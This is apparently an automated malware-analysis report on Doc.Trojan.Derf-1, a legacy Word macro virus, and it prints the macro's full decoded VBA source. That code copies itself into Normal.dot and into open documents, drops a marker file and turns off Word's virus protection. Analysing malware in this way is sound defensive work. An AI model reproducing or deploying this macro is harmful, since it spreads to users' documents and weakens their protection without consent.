Doc.Trojan.Derf-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 8fa77b1aabbc9f71…

MALICIOUS

Office (OLE)

35.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 863f19fb9b014418c483d12de528fe15 SHA-1: 6ae223aae4a90381d612893eee340b5857e855bb SHA-256: 8fa77b1aabbc9f716f1ff21e4c79e2bc0a8511e495e615cc8d04b20698ec9087
200 Risk Score

Malware Insights

Doc.Trojan.Derf-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is identified as Doc.Trojan.Derf-1 by ClamAV. The AutoOpen VBA macro attempts to establish persistence by copying itself to the Normal.dot template and the current document, and writes a marker file to C:\DERF. The macro also attempts to disable virus protection and may execute further actions based on a randomized condition.

Heuristics 4

  • ClamAV: Doc.Trojan.Derf-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Derf-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7262 bytes
SHA-256: 1ec61db41472648b4ee8283427fbd67a97ceb1368b131f773756aca794fc94df
Detection
ClamAV: Doc.Trojan.Derf-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Dim DocFileName
Sub beeper()
For x = 1 To 100
Beep
For t = 1 To 100000
Next t
Next x
End Sub
'Please don't delete me.

Sub AutoOpen()

    DocFileName = Windows(1).Document.FullName
    
    Open "C:\DERF" For Random As #1
    Get #1, , Text
    Close #1
    
    If Text <> "Derf" Then
    
        Application.OrganizerCopy Source:=DocFileName, Destination:= _
        "C:\Program Files\Microsoft Office\Templates\Normal.dot", Name:="Module1" _
        , Object:=wdOrganizerObjectProjectItems
        Selection.TypeParagraph
    
        Text = "Derf"
        Open "C:\DERF" For Random As #1
        Put #1, , Text
        Close #1
    
    End If
    
    
    On Error GoTo Finish:
    
Other:
    
    Application.OrganizerCopy Source:= _
        "C:\Program Files\Microsoft Office\Templates\Normal.dot", Destination:= _
        DocFileName, Name:="Module1", Object:= _
    wdOrganizerObjectProjectItems
    
Finish:

With Options
    .VirusProtection = False
End With

Randomize (Timer)
If Int(Rnd() * 10) = 5 And WeekDay(Date) = 1 Then
    Fred
End If

End Sub

Sub Fred()

    Ans = InputBox("Hello. My name is Derf. Give me a biscuit.", "Derf")

    If Ans = "biscuit" Or Ans = "a biscuit" Then
        AnsYN = MsgBox("Mmm. Thankyou. Would you like to delete me now?.", vbYesNo, "Derf")
        If AnsYN = Yes Then
            Selection.TypeText Text:="1234567890Derf: Derf is now dead."
            Application.OrganizerDelete Source:= _
            "C:\Program Files\Microsoft Office\Templates\Normal.dot", Name:="Module1" _
            , Object:=wdOrganizerObjectProjectItems
            Application.OrganizerDelete Source:= _
            DocFileName, Name:="Module1" _
            , Object:=wdOrganizerObjectProjectItems
        End If
        If AnsYN = No Then
            GoTo Finish2:
        End If
    Else
        a = MsgBox("OK Then, Bye. I'll be back.", vbOKOnly, "Derf")
    End If
    
    Selection.TypeText Text:="1234567890Derf"

Finish2:

End Sub


' Processing file: /opt/analyzer/scan_staging/cf613df542ab4ab9b09716ae1ac1509c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Module1 - 4069 bytes
' Line #0:
' 	Dim 
' 	VarDefn DocFileName
' Line #1:
' 	FuncDefn (Sub beeper())
' Line #2:
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0064 
' 	For 
' Line #3:
' 	ArgsCall Beep 0x0000 
' Line #4:
' 	StartForVariable 
' 	Ld t 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI4 0x86A0 0x0001 
' 	For 
' Line #5:
' 	StartForVariable 
' 	Ld t 
' 	EndForVariable 
' 	NextVar 
' Line #6:
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	NextVar 
' Line #7:
' 	EndSub 
' Line #8:
' 	QuoteRem 0x0000 0x0017 "Please don't delete me."
' Line #9:
' Line #10:
' 	FuncDefn (Sub AutoOpen())
' Line #11:
' Line #12:
' 	LitDI2 0x0001 
' 	ArgsLd Windows 0x0001 
' 	MemLd Document 
' 	MemLd FullName 
' 	St DocFileName 
' Line #13:
' Line #14:
' 	LitStr 0x0007 "C:\DERF"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Random)
' Line #15:
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Ld Then 
' 	GetRec 
' Line #16:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #17:
' Line #18:
' 	Ld Then 
' 	LitStr 0x0004 "Derf"
' 	Ne 
' 	IfBlock 
' Line #19:
' Line #20:
' 	LineCont 0x0008 09 00 08 00 0E 00 08 00
' 	Ld DocFileName 
' 	ParamNamed Source 
' 	LitStr 0x0036 "C:\Program Files\Microsoft Office\Templates\Normal.dot"
' 	ParamNamed Destination 
' 	LitStr 0x0007 "Module1"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #21:
' 	Ld Selection 
' 	ArgsMemCall TypeParagraph 0x0000 
' Li
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.